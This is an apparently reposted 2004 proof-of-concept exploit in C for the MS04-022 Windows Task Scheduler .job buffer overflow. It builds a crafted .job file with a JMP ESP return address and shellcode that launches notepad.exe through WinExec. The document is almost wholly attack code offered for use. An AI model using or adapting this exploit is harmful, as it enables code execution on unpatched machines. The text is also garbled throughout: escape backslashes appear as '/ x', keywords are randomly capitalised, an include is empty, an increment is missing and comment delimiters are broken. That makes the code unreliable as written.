Microsoft Windows 2KXP Task Scheduler .job Exploit (ms04-022)

xiaoxiao2021-03-05 22

Code:

// ******************************************************** ************

// Microsoft Windows 2K / XP Task Scheduler Vulnerability (ms04-022)

// provof-of-concept exploit for English WinXP SP1

// 15 jul 2004

// Running this Will Create a file "j.job" .hen explorer.exe or any

// File-Open Dialog Box Accesses The Directory Containing this file,

// Notepad.exe will be spawn.

// Greetz: Snooq, SK and All Guys At Sig ^ 2 WWW Security Org SG

// ******************************************************** ************

#include

Unsigned char jobfile [] =

"/ X01 / X05 / X01 / X00 / XD9 / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF"

"/ xff / xff / xff / xff / x46 / x00 / x92 / x00 / x00 / x00 / x00 / x00 / x00 / x0a / x00"

"/ x20 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x03 / x13 / x04 / x00"

"/ xc0 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x00 / x3a / x00 / x5c / x00 / x61 / x00"

"/ x2e / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x00"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x78 / x00 / x00 / x78 / x00 / x79 / x00 / x79 / x00 / x79 / x00 / x79 / x00"

"/ x7a / x00 / x00 / x7a / x00 / x7b / x00 / x7b / x00 / x7b / x00"

"/ X5B / XC1 / XBF / X71" // JMP ESP in Samlib WinXP SP1

"/ x42 / x42 / x42 / x42 / x43 / x43 / x43 / x43 / x44 / x44 / x44 / x44" / x90 / x90 "// JMP ESP LANDS HERE

"/ Xeb / x80" // jmp onward import ing shellcode

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x00 / x00 / x00 / x00 / x04 / x00 / x44 / x00 / x3a / x00"

"/ x5c / x00 / x00 / x00 / x00 / x75 / x00 / x65 / x00 / x73 / x00 / x74 / x00"

"/ x31 / x00 / x00 / x00 / x00 / x00 / x03 / x13 / x04 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / xd4 / x07 / x07 / x00 / x0f / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00";

/ *

* HARMLESS PAYLOAD THAT SPAWNS 'NOTEPAD.EXE' ... = P * Ripped from Snooq's Winzip Exploit

* /

Unsigned char shellcode [] =

"/ x33 / xc0" // xor eax, Eax // Slight Modification to Move ESP UP

"/ xb0 / xf0" // MOV Al, 0F0H

"/ x2b / xe0" // Sub ESP, EAX

"/ x83 / xe4 / xf0" // and ESP, 0FFFFFF0H

"/ x55" // push ebp

"/ x8b / xec" // MOV EBP, ESP

"/ x33 / xf6" // xor ESI, ESI

"/ x56" // push ESI

"/ x68 / x2e / x65 / x78 / x65" // push 'exe.'

"/ x68 / x65 / x70 / x61 / x64" // push 'dape'

"/ x68 / x90 / x6e / x6f / x74" // push 'ton'

"/ x46" // inco

"/ x56" // push ESI

"/ x8d / x7d / xf1" // Lea EDI, [EBP-0xF]

"/ x57" // push edi

"/ xb8xxxx" // MOV EAX, XXXX -> Winexec ()

"/ XFF / XD0" // Call EAX

"/ x4e" // DEC ESI

"/ x56" // push ESI

"/ xb8yyyyy" // Mov Eax, YYYY -> EXIXTPROCESS ()

"/ XFF / XD0"; // Call EAX

Int main (int Argc, char * argv [])

{

Unsigned char * ptr = (unsigned char *) shellcode;

While (* PTR)

{

IF (* (long *) PTR) == 0x58585858)

{

* ((long *) PTR) = (long) getProcaddress ("kernel32.dll"), "Winexec");

}

IF (* ((long *) PTR) == 0x59595959)

{

* ((long *) PTR) = (long) getProcadDress ("kernel32.dll"), "EXITPROCESS");

}

PTR ;

}

File * fp;

fp = fopen ("j.xxx", "wb");

IF (fp)

{

Unsigned char * ptr = jobfile (31 * 16);

Memcpy (PTR, Shellcode, Sizeof (Shellcode) - 1);

FWRITE (Jobfile, 1, SizeOf (Jobfile) -1, FP);

Fclose (fp);

Deletefile ("j.job");

Movefile ("j.xxx", "j.job");

}

Return 0;

}

转载请注明原文地址:https://www.9cbs.com/read-37762.html

9cbs

New Post(0)